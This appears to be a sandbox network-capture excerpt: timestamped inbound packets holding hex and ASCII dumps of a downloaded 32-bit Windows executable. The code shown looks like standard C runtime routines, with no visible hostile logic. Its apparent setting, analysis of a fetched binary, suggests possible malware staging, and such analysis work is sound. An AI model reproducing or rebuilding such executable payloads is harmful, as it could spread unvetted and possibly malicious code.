2023-11-18 09:02:38 UTC	802	IN	Data Raw: 00 00 83 f9 20 0f 82 d2 04 00 00 81 f9 80 00 00 00 73 13 0f ba 25 10 10 14 10 01 0f 82 8e 04 00 00 e9 e3 01 00 00 0f ba 25 70 3a 14 10 01 73 09 f3 a4 8b 44 24 0c 5e 5f c3 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 10 10 14 10 01 0f 82 e0 03 00 00 0f ba 25 70 3a 14 10 00 0f 83 a9 01 00 00 f7 c7 03 00 00 00 0f 85 9d 01 00 00 f7 c6 03 00 00 00 0f 85 ac 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 65 0f ba e6 03 0f 83 b4 00 00 00 66 0f 6f 4e f4 8d 76 f4 8b ff 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 0c 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 0c 66 0f Data Ascii: s%%p:sD$^_3u%%p:svs~vftefoNvfo^0foF fon0v00fof:ffof:fGfof:f
2023-11-18 09:02:38 UTC	804	IN	Data Raw: cc cc cc cc cc cc cc cc cc 55 8b ec 57 83 3d 6c 3a 14 10 01 0f 82 fd 00 00 00 8b 7d 08 77 77 0f b6 55 0c 8b c2 c1 e2 08 0b d0 66 0f 6e da f2 0f 70 db 00 0f 16 db b9 0f 00 00 00 23 cf 83 c8 ff d3 e0 2b f9 33 d2 f3 0f 6f 0f 66 0f ef d2 66 0f 74 d1 66 0f 74 cb 66 0f d7 ca 23 c8 75 18 66 0f d7 c9 23 c8 0f bd c1 03 c7 85 c9 0f 45 d0 83 c8 ff 83 c7 10 eb d0 53 66 0f d7 d9 23 d8 d1 e1 33 c0 2b c1 23 c8 49 23 cb 5b 0f bd c1 03 c7 85 c9 0f 44 c2 5f c9 c3 0f b6 55 0c 85 d2 74 39 33 c0 f7 c7 0f 00 00 00 74 15 0f b6 0f 3b ca 0f 44 c7 85 c9 74 20 47 f7 c7 0f 00 00 00 75 eb 66 0f 6e c2 83 c7 10 66 0f 3a 63 47 f0 40 8d 4c 0f f0 0f 42 c1 75 ed 5f c9 c3 b8 f0 ff ff ff 23 c7 66 0f ef c0 66 0f 74 00 b9 0f 00 00 00 23 cf ba ff ff ff ff d3 e2 66 0f d7 f8 23 fa 75 14 66 0f ef Data Ascii: UW=l:}wwUfnp#+3offtftf#uf#ESf#3+#I#[D_Ut93t;Dt Gufnf:cG@LBu_#fft#f#uf
2023-11-18 09:02:38 UTC	805	IN	Data Raw: eb b0 64 8f 05 00 00 00 00 83 c4 18 5f 5e 5b c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 33 8b 44 24 08 8b 48 08 33 c8 e8 1c e8 ff ff 55 8b 68 18 ff 70 0c ff 70 10 ff 70 14 e8 3e ff ff ff 83 c4 0c 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 55 ff 74 24 08 e8 c5 f4 ff ff 83 c4 04 8b 4c 24 08 8b 29 ff 71 1c ff 71 18 ff 71 28 e8 09 ff ff ff 83 c4 0c 5d c2 04 00 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 8b ea 8b f1 8b c1 6a 01 e8 03 06 00 00 33 c0 33 db 33 c9 33 d2 33 ff ff e6 55 8b ec 53 56 57 6a 00 52 68 32 2a 00 10 51 e8 0c 25 01 00 5f 5e 5b 5d c3 55 8b 6c 24 08 52 51 ff 74 24 14 e8 a9 fe ff ff 83 c4 0c 5d c2 08 00 55 8b ec 8b 45 08 85 c0 74 0e 3d 74 3a 14 10 74 07 50 e8 8f 50 00 00 59 5d c2 04 00 55 8b ec a1 20 Data Ascii: d_^[L$At3D$H3Uhppp>]D$T$Ut$L$)qqq(]UVWS33333[_^]j33333USVWjRh2*Q%_^[]Ul$RQt$]UEt=t:tPPY]U
2023-11-18 09:02:38 UTC	806	IN	Data Raw: 14 10 83 e0 1f 6a 20 59 2b c8 33 c0 d3 c8 33 05 04 10 14 10 a3 ec 3a 14 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 56 57 55 6a 00 6a 00 68 18 2f 00 10 ff 75 08 e8 26 20 01 00 5d 5f 5e 5b 8b e5 5d c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 32 8b 44 24 14 8b 48 fc 33 c8 e8 7c e2 ff ff 55 8b 68 10 8b 50 28 52 8b 50 24 52 e8 14 00 00 00 83 c4 08 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 53 56 57 8b 44 24 10 55 50 6a fe 68 20 2f 00 10 64 ff 35 00 00 00 00 a1 04 10 14 10 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 8b 44 24 28 8b 58 08 8b 70 0c 83 fe ff 74 3a 83 7c 24 2c ff 74 06 3b 74 24 2c 76 2d 8d 34 76 8b 0c b3 89 4c 24 0c 89 48 0c 83 7c b3 04 00 75 17 68 01 01 00 00 8b 44 b3 08 e8 Data Ascii: j Y+33:USVWUjjh/u& ]_^[]L$At2D$H3\|UhP(RP$R]D$T$SVWD$UPjh /d53PD$dD$(Xpt:\|$,t;t$,v-4vL$H\|uhD
2023-11-18 09:02:38 UTC	808	IN	Data Raw: c3 8b 65 e8 ff 75 e0 e8 73 3b 00 00 cc 8b ff 55 8b ec 56 8b 75 08 85 f6 74 25 83 7e 08 00 74 09 ff 76 08 ff 15 dc 80 11 10 83 7e 0c 00 74 09 ff 76 0c ff 15 20 81 11 10 56 e8 94 46 00 00 59 5e 5d c2 04 00 8b ff 55 8b ec 56 e8 bb 58 00 00 85 c0 75 09 ff 75 08 ff 15 bc 81 11 10 8b b0 60 03 00 00 85 f6 74 ed 80 7e 10 00 74 05 e8 fc 5d 00 00 8b 46 08 83 f8 ff 74 0b 85 c0 74 07 50 ff 15 dc 80 11 10 8b 46 0c 83 f8 ff 74 c7 85 c0 74 c3 ff 75 08 50 ff 15 c0 81 11 10 cc 8b ff 55 8b ec 51 56 6a 14 6a 01 e8 4c 47 00 00 6a 00 8b f0 e8 1e 46 00 00 83 c4 0c 85 f6 74 18 8b 45 0c 8b 4d 08 89 46 04 8d 46 0c 50 51 6a 04 89 0e ff 15 c4 81 11 10 6a 00 8d 4d ff e8 30 ff ff ff 8b c6 5e 8b e5 5d c3 8b ff 55 8b ec 51 51 83 7d 10 00 75 14 e8 b5 1d 00 00 c7 00 16 00 00 00 e8 a4 53 Data Ascii: eus;UVut%~tv~tv VFY^]UVXuu`t~t]FttPFttuPUQVjjLGjFtEMFFPQjjM0^]UQQ}uS
2023-11-18 09:02:38 UTC	809	IN	Data Raw: 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 10 6a 00 ff 75 08 e8 b4 ff ff ff 59 59 8b c8 eb 0e 8b 4d 08 8d 41 bf 83 f8 19 77 03 83 c1 20 8b c1 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 10 6a 00 ff 75 08 e8 9e ff ff ff 59 59 8b c8 eb 0e 8b 4d 08 8d 41 9f 83 f8 19 77 03 83 c1 e0 8b c1 5d c3 8b ff 55 8b ec 83 ec 14 56 8b 75 08 85 f6 75 13 e8 dd 18 00 00 6a 16 5e 89 30 e8 cd 4e 00 00 8b c6 eb 53 57 6a 09 83 c8 ff 8b fe 59 f3 ab 8b 7d 0c 85 ff 75 13 e8 b8 18 00 00 6a 16 5e 89 30 e8 a8 4e 00 00 8b c6 eb 2d 53 33 db 39 5f 04 7f 06 7c 16 39 1f 72 12 6a 07 58 39 47 04 7c 1d 7f 08 81 3f ff 6f 40 93 76 13 e8 85 18 00 00 6a 16 5e 89 30 8b c6 5b 5f 5e 8b e5 5d c3 e8 61 68 00 00 8d 45 f8 89 5d f8 50 89 5d f4 89 5d fc e8 0d 5e 00 00 59 85 c0 0f 85 e4 01 00 00 8d 45 f4 50 Data Ascii: UD=tjuYYMAw ]UD=tjuYYMAw]UVuuj^0NSWjY}uj^0N-S39_\|9rjX9G\|?o@vj^0[_^]ahE]P]]^YEP
2023-11-18 09:02:38 UTC	810	IN	Data Raw: e8 54 f9 ff ff 8d 45 f4 50 68 03 01 00 00 ff 75 08 e8 2a fa ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 8d 4d f0 ff 75 0c e8 19 f9 ff ff 83 7d 08 09 75 05 6a 40 58 eb 11 8d 45 f4 50 6a 40 ff 75 08 e8 e7 f9 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 d6 f8 ff ff 8d 45 f4 50 6a 04 ff 75 08 e8 af f9 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 0e 6a 00 ff 75 08 e8 32 ff ff ff 59 59 5d c3 8b 4d 08 a1 68 10 14 10 0f b7 04 48 25 03 01 00 00 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 0e 6a 00 ff 75 08 e8 3e ff ff ff 59 59 5d c3 8b 4d 08 83 f9 09 75 05 6a 40 58 5d Data Ascii: TEPhu*}tMP]UMu}uj@XEPj@u}tMP]UuMEPju}tMP]UD=tju2YY]MhH%]UD=tju>YY]Muj@X]
2023-11-18 09:02:39 UTC	812	IN	Data Raw: 10 ff d6 83 c4 08 85 c0 7e 10 57 ff b5 08 ff ff ff 53 e8 8e fe ff ff 83 c4 0c 8b 85 08 ff ff ff 8b f8 8b b5 fc fe ff ff 8b 95 04 ff ff ff 89 85 ec fe ff ff 90 3b de 76 37 03 f2 89 b5 f4 fe ff ff 3b f3 73 25 8b 8d 00 ff ff ff 53 56 ff 15 40 82 11 10 ff 95 00 ff ff ff 8b 95 04 ff ff ff 83 c4 08 85 c0 7e d3 3b de 77 3d 8b 85 08 ff ff ff 8b bd 00 ff ff ff 03 f2 3b f0 77 1f 53 56 8b cf ff 15 40 82 11 10 ff d7 8b 95 04 ff ff ff 83 c4 08 85 c0 8b 85 08 ff ff ff 7e db 8b bd ec fe ff ff 89 b5 f4 fe ff ff 8b b5 00 ff ff ff eb 06 8d 9b 00 00 00 00 8b 95 04 ff ff ff 2b fa 3b fb 76 19 53 57 8b ce ff 15 40 82 11 10 ff d6 83 c4 08 85 c0 7f e1 8b 95 04 ff ff ff 8b b5 f4 fe ff ff 89 bd ec fe ff ff 3b fe 72 5e 89 95 e8 fe ff ff 89 bd e4 fe ff ff 3b f7 74 33 8b de 8b d7 8b Data Ascii: ~WS;v7;s%SV@~;w=;wSV@~+;vSW@;r^;t3
2023-11-18 09:02:39 UTC	813	IN	Data Raw: 00 00 80 72 08 77 e8 83 7d 0c 00 77 e2 85 c0 75 11 81 7d 10 ff ff ff 7f 72 08 77 d3 83 7d 0c ff 77 cd 32 c0 5d c3 8b ff 55 8b ec 83 ec 28 8d 4d 0c 53 57 e8 76 1b 00 00 84 c0 74 21 8b 7d 14 85 ff 74 30 83 ff 02 7c 05 83 ff 24 7e 26 e8 c7 09 00 00 c7 00 16 00 00 00 e8 b6 3f 00 00 33 db 8b 55 10 85 d2 74 05 8b 4d 0c 89 0a 5f 8b c3 5b 8b e5 5d c3 56 ff 75 08 8d 4d d8 e8 fa ee ff ff 8b 45 0c 33 f6 89 75 f4 89 45 e8 eb 03 8b 45 0c 8a 18 40 89 45 0c 8d 45 dc 50 0f b6 c3 6a 08 50 88 5d fc e8 b9 ef ff ff 83 c4 0c 85 c0 75 de 38 45 18 0f 95 c0 89 45 f8 80 fb 2d 75 08 83 c8 02 89 45 f8 eb 05 80 fb 2b 75 0e 8b 75 0c 8a 1e 46 88 5d fc 89 75 0c eb 03 8b 75 0c 85 ff 74 05 83 ff 10 75 78 8a c3 2c 30 3c 09 77 08 0f be c3 83 c0 d0 eb 23 8a c3 2c 61 3c 19 77 08 0f be c3 83 Data Ascii: rw}wu}rw}w2]U(MSWvt!}t0\|$~&?3UtM_[]VuME3uEE@EEPjP]u8EE-uE+uuF]uutux,0<w#,a<w
2023-11-18 09:02:39 UTC	815	IN	Data Raw: 89 5d e8 33 db 89 45 f0 89 4d ec 6a 30 58 66 3b f0 0f 82 a1 01 00 00 6a 3a 5a 66 3b f2 73 0a 0f b7 fe 2b f8 e9 8a 01 00 00 b8 10 ff 00 00 66 3b f0 0f 83 6b 01 00 00 b8 60 06 00 00 66 3b f0 0f 82 73 01 00 00 8d 50 0a 66 3b f2 72 d2 b8 f0 06 00 00 66 3b f0 0f 82 5d 01 00 00 8d 50 0a 66 3b f2 72 bc b8 66 09 00 00 66 3b f0 0f 82 47 01 00 00 8d 50 0a 66 3b f2 72 a6 8d 42 76 66 3b f0 0f 82 33 01 00 00 8d 50 0a 66 3b f2 72 92 8d 42 76 66 3b f0 0f 82 1f 01 00 00 8d 50 0a 66 3b f2 0f 82 7a ff ff ff 8d 42 76 66 3b f0 0f 82 07 01 00 00 8d 50 0a 66 3b f2 0f 82 62 ff ff ff 8d 42 76 66 3b f0 0f 82 ef 00 00 00 8d 50 0a 66 3b f2 0f 82 4a ff ff ff b8 66 0c 00 00 66 3b f0 0f 82 d5 00 00 00 8d 50 0a 66 3b f2 0f 82 30 ff ff ff 8d 42 76 66 3b f0 0f 82 bd 00 00 00 8d 50 0a 66 Data Ascii: ]3EMj0Xf;j:Zf;s+f;k`f;sPf;rf;]Pf;rff;GPf;rBvf;3Pf;rBvf;Pf;zBvf;Pf;bBvf;Pf;Jff;Pf;0Bvf;Pf
2023-11-18 09:02:39 UTC	816	IN	Data Raw: 15 00 00 dc 45 f8 51 51 dd 1c 24 e8 02 5b 00 00 59 59 eb 0d dd d9 e8 9f 64 00 00 dc 05 00 8d 11 10 8b e5 5d c3 8b ff 55 8b ec 81 ec 84 04 00 00 a1 04 10 14 10 33 c5 89 45 fc 83 7d 18 00 8b 45 10 53 8b 5d 14 89 85 a0 fb ff ff 75 18 e8 15 ff ff ff c7 00 16 00 00 00 e8 04 35 00 00 83 c8 ff e9 11 01 00 00 85 db 74 04 85 c0 74 e0 56 57 ff 75 1c 8d 8d 7c fb ff ff e8 4a e4 ff ff 8b 4d 08 8d bd 90 fb ff ff 33 c0 33 d2 ab ab ab ab 8b c1 8b bd a0 fb ff ff 83 e0 02 89 85 8c fb ff ff 0b c2 89 bd 90 fb ff ff 89 9d 94 fb ff ff 89 95 98 fb ff ff 75 0a 88 95 9c fb ff ff 85 ff 75 07 c6 85 9c fb ff ff 01 ff 75 20 8d 85 90 fb ff ff 89 85 a0 fb ff ff 8d 85 80 fb ff ff 50 ff 75 18 8d 85 a0 fb ff ff ff 75 0c 51 50 8d 8d a4 fb ff ff e8 54 03 00 00 8d 8d a4 fb ff ff e8 fd 04 00 Data Ascii: EQQ$[YYd]U3E}ES]u5ttVWu\|JM33uuu PuuQPT
2023-11-18 09:02:39 UTC	817	IN	Data Raw: 65 eb 0c 46 0f b6 06 50 e8 16 e7 ff ff 85 c0 59 75 f1 0f be 06 50 e8 a1 e0 ff ff 59 83 f8 78 75 03 83 c6 02 8b 45 0c 8a 0e 8b 00 8b 80 88 00 00 00 8b 00 8a 00 88 06 46 8a 06 88 0e 8a c8 8a 06 46 84 c0 75 f3 5e 5d c3 8b ff 55 8b ec 51 53 56 8b f1 8d 4d fc 57 6a 0a 51 8b 7e 0c 8b 1f 83 27 00 8b 46 10 83 65 fc 00 48 50 e8 1d 60 00 00 8b 4d 08 83 c4 0c 89 01 8b 46 0c 83 38 22 74 0f 8b 45 fc 3b 46 10 72 07 89 46 10 b0 01 eb 02 32 c0 83 3f 00 75 06 85 db 74 02 89 1f 5f 5e 5b 8b e5 5d c2 04 00 8b ff 56 8b f1 8d 8e 48 04 00 00 e8 ef 0a 00 00 84 c0 75 05 83 c8 ff 5e c3 53 33 db 39 5e 10 0f 85 bb 00 00 00 e8 40 f9 ff ff c7 00 16 00 00 00 e8 2f 2f 00 00 83 c8 ff e9 b9 00 00 00 89 5e 38 89 5e 1c e9 85 00 00 00 ff 46 10 39 5e 18 0f 8c 8c 00 00 00 ff 76 1c 0f b6 46 31 Data Ascii: eFPYuPYxuEFFu^]UQSVMWjQ~'FeHP`MF8"tE;FrF2?ut_^[]VHu^S39^@//^8^F9^vF1
2023-11-18 09:02:39 UTC	819	IN	Data Raw: 06 c6 45 fc 2d eb 16 84 d3 74 06 c6 45 fc 2b eb 0c 8b c2 d1 e8 84 c3 74 06 c6 45 fc 20 8b fb 8a 4e 31 80 f9 78 74 05 80 f9 58 75 09 8b c2 c1 e8 05 84 c3 75 02 32 db 80 f9 61 74 09 80 f9 41 74 04 32 c0 eb 02 b0 01 84 db 75 04 84 c0 74 27 c6 44 3d fc 30 80 f9 58 74 09 80 f9 41 74 04 32 c0 eb 02 b0 01 84 c0 0f 94 c0 fe c8 24 e0 04 78 88 44 3d fd 83 c7 02 8b 5e 24 2b 5e 38 2b df f6 c2 0c 75 16 8d 46 18 50 53 8d 86 48 04 00 00 6a 20 50 e8 52 f8 ff ff 83 c4 10 ff 76 0c 8d 46 18 50 57 8d 45 fc 8d 8e 48 04 00 00 50 e8 9e 06 00 00 8b 4e 20 8d 7e 18 8b c1 c1 e8 03 a8 01 74 1b c1 e9 02 f6 c1 01 75 13 57 53 8d 86 48 04 00 00 6a 30 50 e8 11 f8 ff ff 83 c4 10 6a 00 8b ce e8 c4 05 00 00 83 3f 00 7c 1d 8b 46 20 c1 e8 02 a8 01 74 13 57 53 8d 86 48 04 00 00 6a 20 50 e8 e6 Data Ascii: E-tE+tE N1xtXuu2atAt2ut'D=0XtAt2$xD=^$+^8+uFPSHj PRvFPWEHPN ~tuWSHj0Pj?\|F tWSHj P
2023-11-18 09:02:39 UTC	820	IN	Data Raw: ff 76 2c e8 d8 fb ff ff 59 83 e8 01 74 2b 83 e8 01 74 1d 48 83 e8 01 74 10 83 e8 04 75 ce 8b 46 18 99 89 07 89 57 04 eb 15 8b 46 18 89 07 eb 0e 66 8b 46 18 66 89 07 eb 05 8a 46 18 88 07 c6 46 30 01 b0 01 5f 5e c3 8b 51 20 8b c2 c1 e8 05 a8 01 74 09 81 ca 80 00 00 00 89 51 20 6a 00 6a 08 e8 24 fe ff ff c3 6a 01 6a 10 c7 41 28 08 00 00 00 c7 41 2c 0a 00 00 00 e8 0c fe ff ff c3 8b ff 53 56 8b f1 57 83 46 14 04 8b 46 14 8b 7e 28 8b 58 fc 89 5e 34 83 ff ff 75 05 bf ff ff ff 7f ff 76 2c 0f b6 46 31 50 ff 76 04 ff 36 e8 83 f1 ff ff 83 c4 10 84 c0 74 1a 85 db 75 07 c7 46 34 6c 8d 11 10 57 ff 76 34 c6 46 3c 01 e8 af 58 00 00 eb 14 85 db 75 07 c7 46 34 64 8d 11 10 57 ff 76 34 e8 72 57 00 00 59 59 5f 89 46 38 b0 01 5e 5b c3 83 39 00 75 13 e8 61 ee ff ff c7 00 16 00 Data Ascii: v,Yt+tHtuFWFfFfFF0_^Q tQ jj$jjA(A,SVWFF~(X^4uv,F1Pv6tuF4lWv4F<XuF4dWv4rWYY_F8^[9ua
2023-11-18 09:02:39 UTC	821	IN	Data Raw: 00 00 00 e9 f3 fe ff ff d9 ee 84 cd 0f 84 22 19 00 00 d9 e0 e9 1b 19 00 00 dd d8 d9 e8 e9 12 19 00 00 d9 c1 e8 1e 00 00 00 d9 e0 84 c9 0f 85 9d fe ff ff dd d8 dd d8 db 2d 70 90 11 10 b8 01 00 00 00 e9 b4 fe ff ff d9 c0 d9 fc d8 d9 b1 00 9b df e0 9e 75 17 dc 0d 84 8d 11 10 fe c1 d9 c0 d9 fc de d9 9b df e0 9e 75 02 fe c1 c3 dd d8 c3 cc cc cc cc cc cc cc 83 ec 0c dd 14 24 e8 9d 18 00 00 e8 0d 00 00 00 83 c4 0c c3 8d 54 24 04 e8 48 18 00 00 52 9b d9 3c 24 8b 44 24 0c 74 51 66 81 3c 24 7f 02 74 05 e8 00 18 00 00 a9 00 00 00 80 75 1f d9 fa 83 3d 68 3c 14 10 00 0f 85 73 18 00 00 ba 05 00 00 00 8d 0d 90 8d 11 10 e9 70 18 00 00 a9 00 00 f0 7f 75 2c a9 ff ff 0f 00 75 25 83 7c 24 08 00 75 1e eb cc e8 d5 17 00 00 eb 22 a9 ff ff 0f 00 75 f2 83 7c 24 08 00 75 eb 25 00 Data Ascii: "-puu$T$HR<$D$tQf<$tu=h<spu,u%\|$u"u\|$u%
2023-11-18 09:02:39 UTC	823	IN	Data Raw: 75 11 68 74 82 11 10 68 64 82 11 10 e8 00 fd ff ff 59 59 68 7c 82 11 10 68 78 82 11 10 e8 ef fc ff ff 59 59 85 f6 75 07 c6 05 34 3b 14 10 01 c7 45 fc fe ff ff ff e8 27 00 00 00 85 f6 75 2c ff 75 08 e8 2a 00 00 00 8b 45 ec 8b 00 ff 30 e8 f2 fe ff ff 83 c4 04 c3 8b 65 e8 e8 36 0c 00 00 8b 75 10 6a 02 e8 6a 70 00 00 59 c3 e8 f6 e2 00 00 c3 8b ff 55 8b ec e8 60 24 00 00 84 c0 74 20 64 a1 30 00 00 00 8b 40 68 c1 e8 08 a8 01 75 10 ff 75 08 ff 15 7c 81 11 10 50 ff 15 80 81 11 10 ff 75 08 e8 4f 00 00 00 59 ff 75 08 ff 15 c8 81 11 10 cc 6a 00 ff 15 1c 81 11 10 8b c8 85 c9 75 03 32 c0 c3 b8 4d 5a 00 00 66 39 01 75 f3 8b 41 3c 03 c1 81 38 50 45 00 00 75 e6 b9 0b 01 00 00 66 39 48 18 75 db 83 78 74 0e 76 d5 83 b8 e8 00 00 00 00 0f 95 c0 c3 8b ff 55 8b ec 51 51 a1 04 Data Ascii: uhthdYYh\|hxYYu4;E'u,u*E0e6ujjpYU`$t d0@huu\|PuOYuju2MZf9uA<8PEuf9HuxtvUQQ
2023-11-18 09:02:39 UTC	824	IN	Data Raw: d8 59 59 85 db 74 6d 89 5d fc eb 52 8b cf 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 80 3f 3d 8d 41 01 89 45 f8 74 37 6a 01 50 e8 70 08 00 00 8b f0 59 59 85 f6 74 30 57 ff 75 f8 56 e8 c1 07 00 00 83 c4 0c 85 c0 75 41 8b 45 fc 6a 00 89 30 83 c0 04 89 45 fc e8 20 07 00 00 8b 45 f8 59 03 f8 80 3f 00 75 a9 eb 11 53 e8 29 00 00 00 6a 00 e8 06 07 00 00 59 59 33 db 6a 00 e8 fb 06 00 00 59 5f 5e 8b c3 5b 8b e5 5d c3 33 c0 50 50 50 50 50 e8 c8 14 00 00 cc 8b ff 55 8b ec 56 8b 75 08 85 f6 74 1f 8b 06 57 8b fe eb 0c 50 e8 ca 06 00 00 8d 7f 04 8b 07 59 85 c0 75 f0 56 e8 ba 06 00 00 59 5f 5e 5d c3 8b ff 57 8b 3d 44 3c 14 10 85 ff 75 05 83 c8 ff 5f c3 53 56 33 db eb 51 53 53 53 53 6a ff ff 37 53 53 ff 15 24 81 11 10 8b d8 85 db 74 4c 6a 01 53 e8 a4 07 00 00 8b f0 59 59 85 f6 Data Ascii: YYtm]RQAu+?=AEt7jPpYYt0WuVuAEj0E EY?uS)jYY3jY_^[]3PPPPPUVutWPYuVY_^]W=D<u_SV3QSSSSj7SS$tLjSYY
2023-11-18 09:02:39 UTC	825	IN	Data Raw: 0b 83 c4 10 8b 09 89 41 08 33 c0 5f 5b 5e 8b e5 5d c3 8b ff 55 8b ec ff 75 08 68 50 3c 14 10 e8 5e 00 00 00 59 59 5d c3 8b ff 55 8b ec 51 8d 45 08 89 45 fc 8d 45 fc 50 6a 02 e8 03 fd ff ff 59 59 8b e5 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 05 83 c8 ff eb 28 8b 06 3b 46 08 75 1f a1 04 10 14 10 83 e0 1f 6a 20 59 2b c8 33 c0 d3 c8 33 05 04 10 14 10 89 06 89 46 04 89 46 08 33 c0 5e 5d c3 8b ff 55 8b ec 51 51 8d 45 08 89 45 f8 8d 45 0c 89 45 fc 8d 45 f8 50 6a 02 e8 ca fc ff ff 59 59 8b e5 5d c3 68 68 10 14 10 b9 48 3d 14 10 e8 42 0d 00 00 b0 01 c3 68 50 3c 14 10 e8 83 ff ff ff c7 04 24 5c 3c 14 10 e8 77 ff ff ff 59 b0 01 c3 e8 8d fb ff ff b0 01 c3 b0 01 c3 a1 04 10 14 10 56 6a 20 83 e0 1f 33 f6 59 2b c8 d3 ce 33 35 04 10 14 10 56 e8 68 0e 00 00 56 e8 62 77 Data Ascii: A3_[^]UuhP<^YY]UQEEEPjYY]UVuu(;Fuj Y+33FF3^]UQQEEEEEPjYY]hhH=BhP<$\<wYVj 3Y+35VhVbw
2023-11-18 09:02:39 UTC	827	IN	Data Raw: da f2 0f 5c d5 f2 0f 59 dd f2 0f 58 1d 28 90 11 10 f2 0f 5e d3 66 0f 14 d2 eb 19 b8 00 03 00 00 f3 0f 7e c2 f3 0f 7e 15 20 90 11 10 f2 0f 5e d0 66 0f 14 d2 f3 0f 7e 04 c5 00 af 11 10 f3 0f 7e 24 c5 08 af 11 10 66 0f 28 ca 66 0f 59 ca 66 0f 28 d9 66 0f 59 d9 66 0f 28 2d 00 90 11 10 66 0f 59 eb 66 0f 58 2d f0 8f 11 10 66 0f 59 eb 66 0f 58 2d e0 8f 11 10 66 0f 59 eb 66 0f 58 2d d0 8f 11 10 f2 0f 59 e9 66 0f 28 dd 66 0f c6 db 01 f2 0f 58 eb f2 0f 59 ea f2 0f 5c ec f2 0f 5c ea f2 0f 5c c5 66 0f 56 c6 66 0f d6 44 24 04 dd 44 24 04 c3 66 0f 2f 15 18 90 11 10 75 05 dd 44 24 04 c3 66 0f 2f 15 60 90 11 10 73 1d dd 05 68 90 11 10 dc 0d 68 90 11 10 83 ec 08 dd 1c 24 dd 04 24 83 c4 08 dc 44 24 04 c3 dd 05 68 90 11 10 dc 0d 68 90 11 10 dc 44 24 04 c3 f3 0f 7e c2 f3 0f Data Ascii: \YX(^f~~ ^f~~$f(fYf(fYf(-fYfX-fYfX-fYfX-Yf(fXY\\\fVfD$D$f/uD$f/`shh$$D$hhD$~
2023-11-18 09:02:39 UTC	828	IN	Data Raw: 12 0d 40 91 11 10 f2 0f 59 c8 66 0f 12 15 48 91 11 10 f2 0f 2d d1 f2 0f 58 ca 66 0f 12 1d 60 91 11 10 f2 0f 5c ca 66 0f 28 15 50 91 11 10 f2 0f 59 d9 66 0f 14 c9 81 c2 00 76 1c 00 f2 0f 10 e0 83 e2 3f 66 0f 28 2d 30 91 11 10 8d 05 10 c7 11 10 c1 e2 05 03 c2 66 0f 59 d1 f2 0f 5c c3 f2 0f 59 0d 68 91 11 10 f2 0f 5c e3 66 0f 12 78 08 66 0f 14 c0 f2 0f 10 dc f2 0f 5c e2 66 0f 59 e8 66 0f 5c c2 66 0f 28 35 10 91 11 10 f2 0f 59 fc f2 0f 5c dc 66 0f 59 e8 66 0f 59 c0 f2 0f 5c da 66 0f 28 10 f2 0f 5c cb 66 0f 12 58 18 f2 0f 58 d3 f2 0f 5c fa f2 0f 59 d4 66 0f 59 f0 f2 0f 59 dc 66 0f 59 d0 66 0f 59 c0 66 0f 58 2d 20 91 11 10 f2 0f 59 20 66 0f 58 35 00 91 11 10 66 0f 59 e8 f2 0f 10 c3 f2 0f 58 58 08 f2 0f 59 cf f2 0f 10 fc f2 0f 58 e3 66 0f 58 f5 66 0f 12 68 08 f2 Data Ascii: @YfH-Xf`\f(PYfv?f(-0fY\Yh\fxf\fYf\f(5Y\fYfY\f(\fXX\YfYYfYfYfX- Y fX5fYXXYXfXfh
2023-11-18 09:02:39 UTC	829	IN	Data Raw: 74 05 6a 05 59 cd 29 56 6a 01 be 17 04 00 c0 56 6a 02 e8 06 fe ff ff 83 c4 0c 56 ff 15 7c 81 11 10 50 ff 15 80 81 11 10 5e c3 6a 08 68 b8 de 13 10 e8 7a 93 ff ff 8b 45 08 ff 30 e8 8e 55 00 00 59 83 65 fc 00 8b 4d 0c 8b 41 04 8b 00 ff 30 8b 01 ff 30 e8 f9 02 00 00 59 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e8 8b 93 ff ff c2 0c 00 8b 45 10 ff 30 e8 9e 55 00 00 59 c3 6a 08 68 d8 de 13 10 e8 2a 93 ff ff 8b 45 08 ff 30 e8 3e 55 00 00 59 83 65 fc 00 8b 45 0c 8b 00 8b 00 8b 48 48 85 c9 74 18 83 c8 ff f0 0f c1 01 75 0f 81 f9 80 15 14 10 74 07 51 e8 5a f1 ff ff 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e8 2a 93 ff ff c2 0c 00 8b 45 10 ff 30 e8 3d 55 00 00 59 c3 6a 08 68 f8 de 13 10 e8 c9 92 ff ff 8b 45 08 ff 30 e8 dd 54 00 00 59 83 65 fc 00 6a 00 8b 45 0c 8b 00 ff 30 Data Ascii: tjY)VjVjV\|P^jhzE0UYeMA00YYEE0UYjhE0>UYeEHHtutQZYEE0=UYjhE0TYejE0
